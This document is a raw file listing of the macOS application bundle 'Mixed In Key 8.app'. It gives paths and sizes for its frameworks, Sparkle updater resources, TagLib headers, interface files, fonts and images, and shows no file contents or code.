                                                                                                    Mixed In Key 8.app/Contents/Resources/control-bar-gradient.tiff9286
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.frameworkD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISystemMessageCommand.h1000
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/Sparkle.strings6532
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/synchronizedlyricsframe.h7333
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUUpdatePermissionPrompt.nib18080
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTraktorQueue.h2685
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 3.mom8506
                                                                                                    Mixed In Key 8.app/Contents/Resources/fonts/Roboto-Light.ttf170420
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/Missing.nib34901
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_CN.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/theme.plist976
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIConnectionManager.h10420
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/MIKMIDI24
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4item.h3113
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/Current1
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/xiphcomment.h9649
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/is.lproj/Sparkle.strings2486
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sv.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUPasswordPrompt.nib11205
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaSequenceEvent.h751
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/tzlib.h2192
                                                                                                    Mixed In Key 8.app/Contents/Resources/info@2x.png2160
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Resources26
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacpicture.h6260
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/de.lproj/Sparkle.strings3674
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/Resources/en.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ar.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/da.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fr.lproj/Sparkle.strings3714
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/Resources/Info.plist1283
                                                                                                    Mixed In Key 8.app/Contents/Resources/Flow_8_Deck_transparent.png66119
                                                                                                    Mixed In Key 8.app/Contents/Resources/piano-big@2x.png548
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Resources/Info.plist1166
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/Current1
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUUpdatePermissionPrompt.nib18619
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ru.lproj/Sparkle.strings4456
                                                                                                    Mixed In Key 8.app/Contents/Resources/theme.plist976
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ca.lproj/Sparkle.strings2830
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tdebuglistener.h3052
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUUpdateAlert.nib15556
                                                                                                    UtilsD0
                                                                                                    Mixed In Key 8.app/Contents/_CodeSignatureD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/_CodeSignature/CodeResources26459
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/Sparkle.strings7008
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ru.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUAutomaticUpdateAlert.nib12175
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEvent.h8401
                                                                                                    Mixed In Key 8.app/Contents/Resources/aboutboxD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sl.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tfile.h10981
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUUpdatePermissionPrompt.nib18550
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/speexfile.h5037
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/MIKAnalysis505920
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/nl.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Sparkle24
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/_CodeSignatureD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/AD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/_CodeSignatureD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/Current1
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/MIKAudio159648
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 4.mom8831
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaEvent.h4187
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Info.plist1514
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/imagesD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/top.css3808
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/PianoKeyboard.nib14864
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/InfoPlist.strings552
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/_CodeSignature/CodeResources6031
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/PrivateHeadersD0
                                                                                                    Mixed In Key 8.app/Contents/ResourcesD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/ResourcesD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/fonts/Roboto-Thin.ttf171904
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/Sparkle.strings7816
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/HeadersD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUUpdateAlert.nib15618
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUUpdatePermissionPrompt.nib18529
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Info.plist1514
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUAutomaticUpdateAlert.nib12198
                                                                                                    Mixed In Key 8.app/Contents/MacOSD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/privateframe.h3607
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUUpdatePermissionPrompt.nib18345
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/_CodeSignature/CodeResources6479
                                                                                                    Mixed In Key 8.app/Contents/Resources/mik-top-left.tiff43612
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/speexproperties.h4251
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/libswiftDarwin.dylib98496
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/MIKTag23
                                                                                                    Mixed In Key 8.app/Contents/Resources/eula/eula.html2594
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/rifffile.h5519
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Headers24
                                                                                                    Mixed In Key 8.app/Contents/Resources/fonts/Roboto-Black.ttf171480
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/TagOptionsView.nib24075
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/ResourcesD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaCuePointEvent.h756
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/_CodeSignatureD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/3to4.cdm13775
                                                                                                    Mixed In Key 8.app/Contents/Resources/aboutbox/about.html3015
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/MIKTag675280
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUAutomaticUpdateAlert.nib12107
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/wavpackproperties.h4777
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaLyricEvent.h726
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/tr.lproj/Sparkle.strings4340
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/libswiftCoreGraphics.dylib197168
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEvent_SubclassMethods.h3910
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSongKeySegment.h969
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr_CA.lproj8
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISystemKeepAliveCommand.h1676
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/VersionsD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/th.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSongWaveform.h478
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/EULA.nib11964
                                                                                                    Mixed In Key 8.app/Contents/FrameworksD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/DragDialog.nib11538
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/libswiftos.dylib58464
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/MainMenu.nib361061
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/commentsframe.h5886
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUAutomaticUpdateAlert.nib12177
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUAutomaticUpdateAlert.nib12207
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_BR.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUAutomaticUpdateAlert.nib12168
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/PublicationWindow.nib6612
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.frameworkD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/PkgInfo8
                                                                                                    Mixed In Key 8.app/Contents/Resources/piano@2x.png859
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetronome.h1039
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/ResourcesD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/fonts/Roboto-Italic.ttf173932
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKAudioSpectrum.h1155
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/vorbisproperties.h4926
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKVolumeAnalyzer.h699
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4coverart.h2817
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUUpdateAlert.nib15594
                                                                                                    Mixed In Key 8.app/Contents/Resources/header-background.png3708
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/fi.lproj/Sparkle.strings2500
                                                                                                    Mixed In Key 8.app/Contents/Resources/hover@2x.png16103
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/top-menutheme.png2813
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/MIKData24
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKRekordboxCuePoint.h1016
                                                                                                    Mixed In Key 8.appD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/add-cue@2x.png947
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/_CodeSignature/CodeResources20623
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/uniquefileidentifierframe.h4407
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/en.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUUpdateAlert.nib15326
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUUpdateAlert.nib15617
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/tr.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpcD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDINoteOnCommand.h2508
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/chapterframe.h8914
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/_CodeSignature/CodeResources69143
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUUpdateAlert.nib15750
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Modules24
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/Sparkle.strings3250
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/AD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUUpdatePermissionPrompt.nib18442
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 2.mom6793
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.frameworkD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKWaveformAnalyzer.h601
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/DanceabilityAudioEngine.framework/Versions/A/DanceabilityAudioEngine1799120
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/is.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pl.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/it.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/VersionsD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/SUStatus.nib11630
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/attachedpictureframe.h7498
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/trueaudiofile.h9158
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKBeats.h782
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/VersionsD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/Sparkle.strings5570
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/Sparkle.strings3412
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/_CodeSignature/CodeResources19698
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUUpdateAlert.nib15840
                                                                                                    Mixed In Key 8.app/Contents/Resources/collection-icon-selected.tiff7872
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_PT.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/uk.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cs.lproj/Sparkle.strings3480
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUUpdateAlert.nib15628
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Resources/English.lproj/Preferences.nib158947
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMapping.h10292
                                                                                                    Mixed In Key 8.app/Contents/_CodeSignature/CodeResources53912
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagUtil.h1891
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/de.lproj/Sparkle.strings3674
                                                                                                    Mixed In Key 8.app/Contents/Resources/fonts/Roboto-LightItalic.ttf176616
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/generalencapsulatedobjectframe.h5949
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacmetadatablock.h2609
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cs.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSong.h4809
                                                                                                    Mixed In Key 8.app/Contents/Resources/MIK.miktheme/images/top-tab-selected.png2845
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tlist.h7748
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/SUStatus.nib11630
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/apeitem.h6333
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaTextEvent.h967
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/MacOSD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/hu.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/asftag.h6244
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/id.lproj/Sparkle.strings2424
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUPasswordPrompt.nib11223
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lprojD0
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/Info.plist1175
                                                                                                    Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/no.lprojD0
